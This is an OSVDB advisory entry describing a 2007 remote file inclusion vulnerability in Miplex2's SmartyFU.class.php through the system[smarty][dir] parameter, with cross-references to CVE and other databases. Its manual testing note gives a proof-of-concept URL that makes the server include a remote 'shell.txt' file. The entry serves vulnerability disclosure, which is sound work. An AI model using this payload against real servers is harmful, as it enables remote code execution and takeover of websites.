Miplex2 lib/smarty/SmartyFU.class.php system[smarty][dir] Variable Remote File Inclusion

2007-05-08T00:00:00
ID OSVDB:37789
Type osvdb
Reporter OSVDB
Modified 2007-05-08T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/lib/smarty/SmartyFU.class.php?system[smarty][dir]=shell.txt?

References:

ISS X-Force ID: 34172 Generic Exploit URL: http://www.milw0rm.com/exploits/3878 FrSIRT Advisory: ADV-2007-1737 CVE-2007-2608 Bugtraq ID: 23884